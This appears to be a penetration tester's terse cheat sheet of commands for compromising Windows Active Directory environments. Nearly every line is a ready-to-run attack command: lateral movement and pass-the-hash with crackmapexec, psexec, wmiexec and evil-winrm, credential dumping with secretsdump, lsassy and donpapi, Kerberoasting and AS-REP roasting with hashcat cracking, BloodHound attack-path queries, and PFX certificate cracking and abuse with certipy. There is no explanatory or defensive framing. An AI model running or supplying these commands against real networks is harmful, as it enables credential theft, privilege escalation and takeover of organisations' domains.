w/ Creds
crackmapexec smb RHOST -u "USER" -p "PASS" --shares -x whoami
crackmapexec rdp RHOST -u "USER" -p "PASS"
crackmapexec winrm RHOST -u "USER" -p "PASS" -x whoami
crackmapexec wmi RHOST -u "USER" -p "PASS" -x whoami
crackmapexec mssql RHOST -u "USER" -p "PASS" -x whoami
crackmapexec ldap RHOST -u "USER" -p "PASS"
crackmapexec ldap RHOST -u "USER" -p "PASS" -M adcs
crackmapexec smb RHOST -u "USER" -p "PASS" --shares -x whoami --local-auth
crackmapexec smb RHOST -u "USER" -p "PASS" --shares --put-file rustscan.exe /windows/temp/rustscan.exe
crackmapexec smb RHOST -u "USER" --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
crackmapexec smb RHOST -u "Administrator" -p "PASS" -M lsassy
enum4linux RHOST -u "USER" -p "PASS"
mssqlclient.py 'USER':'PASS'@RHOST -debug -windows-auth
mkdir /tmp/share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
psexec.py 'Administrator':'pass'@1.2.3.4
psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
smbexec.py 'Administrator':'pass'@1.2.3.4
secretsdump.py Administrator:'pass'@1.2.3.4 -history
secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history
donpapi collect -u Administrator -p 'pass' -d domain.local -t 1.2.3.4 --fetch-pvk
wmiexec.py -k "user.ccache" 'powershell.exe "whoami /all"'
wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
atexec.py 'user':'pass'@1.2.3.4 whoami
dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first
evil-winrm -i domain.com -u user -p 'pass' # Don't forget to add domain in /etc/hosts
Active Directory
LDAP enumeration
ldapsearch -H "ldap://domain.com" -D user@domain.com -w 'pass' -b "dc=domain,dc=com" "*" > /tmp/ldapsearch
ldeep ldap -u user -p 'pass' -d domain.com -s ldaps://1.2.3.4:636 all /tmp/ldeep
ldapdomaindump ldaps://1.2.3.4:3269 -u 'domain.com\user' -p 'pass'
Kerberoasting
GetUserSPNs.py -dc-ip 1.2.3.10 'domain.com/user:pass' -request -outputfile /tmp/hashes.kerberoast
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-path=/home/user/HASHCATPOT
Bloodhound
DC access required
pip3 install --upgrade bloodhound
cd $(mktemp -d)
proxychains -q -f /tmp/PIVOT bloodhound-python --dns-tcp -u'user' -p'pass' -ns '1.2.3.10' -d 'do.main' -c All,LoggedOn
# https://github.com/BloodHoundAD/BloodHound/releases
./BloodHound --no-sandbox # Drag & drop files from last step
Enumeration
# All users group membership, excluding default low-level groups (users, everyone..)
WITH ['-513', '-S-1-1-0', '-S-1-5-11', '-S-1-5-32-554', '-S-1-5-32-545'] AS usergroups MATCH p =(u:User)-[r:MemberOf*1..]->(g:Group) WHERE NOT ANY(group IN usergroups WHERE g.objectid ENDS WITH group) RETURN p
# Domains and computers
MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p
# Domain Users
MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p
# Map of domains/groups/users
MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q
# Users ACL
MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true RETURN p
Easy wins
# Owned Users => High value (I had to remove CanRDP and CanPSRemote because it was not providing me admin access)
MATCH (m:User {owned:true}),(n {highvalue:true}),p=shortestPath((m)-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n RETURN p
# Owned Users => Computers
MATCH (m:User {owned:true}),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZLogicAppContributo|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n)) WHERE m<>n RETURN p
# Any unconstrained Delegation ?
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Any constrained Delegation ?
MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) return p
# kerberoast ?
MATCH (n:User)WHERE n.hasspn=true RETURN n
# GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast
# hashcat -m 13100 -a 0 /tmp/hashes.kerberoast rockyou.txt --potfile-path=HASHCATPOT
# preauth req ?
MATCH (u:User {dontreqpreauth: true}) RETURN u
# GetNPUsers.py -debug 'do.main/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.10
# sudo hashcat -m 18200 /tmp/hashes.aspreroast rockyou.txt --potfile-path=HASHCATPOT
Others (testing)
MATCH p=()-[r:HasSession]->() RETURN p
MATCH p=()-[r:CanRDP|CanPSRemote|ExecuteDCOM]->() RETURN p
Match (n:GPO) return n
MATCH p=(u:User)-[]->() RETURN p
MATCH p=(u:User)-[r:GenericAll]->() RETURN p
MATCH p=()-[r:GenericAll]->() RETURN p
Certificates
Playing with PFX file
# Crack password if any
pfx2john.py legacyy_dev_auth.pfx > hashpfx
/opt/john/run/john hashpfx -wordlist=/usr/share/rockyou.txt
# Save PFX without protection
certipy cert -export -pfx protected.pfx -password "password" -out unprotected.pfx
# Request TGT (then pass the ticket)
certipy auth -pfx unprotected.pfx # -dc-ip 10.129.227.113 -domain 'domain.local' -username 'toto'
# OR...
# Extract cert and key from pfx
certipy cert -pfx unprotected.pfx -nokey -out user.crt
certipy cert -pfx unprotected.pfx -nocert -out user.key
# Use cert and key to connect with winrm
# https://gitlab.com/charles.gargasson/wintools/-/blob/main/winrmcert.rb
ruby winrmcert.rb --ip 10.129.227.113 --cert user.crt --key user.key